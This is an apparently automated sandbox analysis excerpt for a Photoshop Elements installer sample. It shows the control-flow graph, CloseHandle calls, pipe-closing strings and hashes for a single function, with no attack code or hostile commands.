                                                                                                        control_flow_graph 429 3eea70-3eea79 430 3eea7b-3eea7e 429->430 431 3eeaf4-3eeaf9 429->431 430->431 434 3eea80-3eea88 430->434 432 3eeafb-3eeafe 431->432 433 3eeb74-3eeb7c 431->433 432->433 435 3eeb00-3eeb08 432->435 436 3eea8a-3eeab3 434->436 437 3eeab5-3eeabd 434->437 438 3eeb0a-3eeb33 435->438 439 3eeb35-3eeb3d 435->439 441 3eeae4-3eeaed CloseHandle 436->441 440 3eeabf-3eeae1 437->440 437->441 444 3eeb64-3eeb6d CloseHandle 438->444 443 3eeb3f-3eeb61 439->443 439->444 440->441 441->431 443->444 444->433
                                                                                                        APIs
                                                                                                        • CloseHandle.KERNEL32(?,?,00222CC0,003ECFBB,?,Terminate channel), ref: 003EEAE7
                                                                                                        • CloseHandle.KERNEL32(00000000,?,00222CC0,003ECFBB,?,Terminate channel), ref: 003EEB67
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000F.00000002.3743415483.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3743571059.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3743571059.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3743571059.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3743571059.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3743571059.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3753643256.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3753672483.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandle
                                                                                                        • String ID: Closing inPipe %p$Closing outPipe %p$CommBridge$OOBEUtils
                                                                                                        • API String ID: 2962429428-1143323105
                                                                                                        • Opcode ID: fe225fb550eaef699e5f86750ba465ad805333bcb8bac640325651cd6a1283b5
                                                                                                        • Instruction ID: e3359ca4d35adda497539fbb3882b959626e693782c86280b47d76f7c2c1420b
                                                                                                        • Opcode Fuzzy Hash: fe225fb550eaef699e5f86750ba465ad805333bcb8bac640325651cd6a1283b5
                                                                                                        • Instruction Fuzzy Hash: 2821D170B807616FDB16AB299C16F1B7A56BF01B10F06431DF802B76E1C7A0AD01DBD2